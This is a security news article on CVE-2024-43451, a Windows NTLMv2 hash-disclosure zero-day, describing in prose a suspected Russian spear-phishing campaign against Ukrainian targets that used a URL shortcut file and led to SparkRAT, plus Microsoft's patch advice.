How a Windows zero-day was exploited in the wild for months (CVE-2024-43451)
CVE-2024-43451, a Windows zero-day vulnerability for which Microsoft released a fix on November 2024 Patch Tuesday, has been exploited since at least April 2024, ClearSky researchers have revealed.
About the vulnerability
CVE-2024-43451 affects all supported Windows versions and, when triggered, discloses a user’s NTLMv2 hash to the attacker, who can then use it to either mount pass the hash attacks or extract the user’s password from the hash.
The result is in both cases the same: the attacker can authenticate to the target system as the user.
CVE-2024-43451 exploited
ClearSky researchers, with the help of the Ukrainian CERT (CERT-UA), have pieced together the attack, which happened in June 2024.
The (suspected Russian) attacker compromised a Ukrainian academic server to be able to send out credible spear-phishing emails to very specific targets. The email asked the recipient to renew their academic certificate through an attached link.
When the victim clicks, a ZIP file is downloaded, with two files in it: a decoy PDF file with a graduation diploma, and an URL (internet shortcut) file that refers to an external server using the SMB protocol.
A right-click on the file or an attempt to delete it or drag it to another folder triggers the exploitation of CVE-2024-43451. The user’s NTLMv2 hash is delivered to the attacker and used to carry out a pass the hash attack and establish a connection to the attacker’s server.
Finally, when an EXE file posing as the certificate is downloaded from the server and executed, it shows a decoy message stating that the certificate has been activated and, in the background, it drops additional files that lead to the installation and execution of the SparkRAT malware.
Other attacks exploiting the flaw?
An analysis of the URL file has revealed similarly structured files that have been submitted to VirusTotal since early April:
Other similarly structured URL files exploiting CVE-2024-43451 (Source: ClearSky)
The names of those files point to the vulnerability having been exploited in similar attack scenarios to target other organizations with the Redline infostealer.
The similarity has two possible explanations, the researchers said: there was either one attacker that used different types of malware or two different threat actors exploiting the same vulnerability.
What to do?
ClearSky researchers have explained how a file that exploits CVE-2024-43451 can be created, and have noted that the vulnerability is more exploitable on Windows 10/11 operating systems than on older ones.
“On Windows 7, 8, and 8.1, the file did not initiate communication when dragged or deleted, unless the target folder was open at the time of dragging (this did not happen on the first attempt but was observed only after 2-3 attempts),” they found.
Microsoft has released a patch for CVE-2024-43451 and has advised Windows and Windows Server users to implement them as soon as possible.